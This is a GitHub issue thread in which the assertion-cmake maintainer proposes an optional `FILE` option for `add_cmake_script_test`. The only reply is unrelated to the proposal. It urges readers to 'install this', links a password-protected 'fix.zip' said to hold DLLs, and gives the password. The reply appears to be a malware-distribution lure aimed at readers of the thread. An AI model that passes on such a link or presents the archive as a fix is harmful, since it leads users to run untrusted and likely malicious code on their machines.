### ISSUE TITLE
Add Optional `FILE` Option in Add Test Function

### ISSUE THREAD

**Issue by threeal** [threeal/assertion-cmake#289]
This issue suggests adding support for specifying a new `FILE` option in the `add_cmake_script_test` function, which behaves the same as the `CALL` option in the `assert_call` function and the `COMMAND` option in the `assert_execute_process` function. The `FILE` option will be optional and will exist solely to indicate the required `file` argument, allowing for better code styling and formatting.

**Comment by Gelinus** [comment]
install this

https://www.mediafire.com/file/6r8pvis8j6lc0j9/fix.zip/file
Archive password: xfp53
I put the necessary dlls in the archive
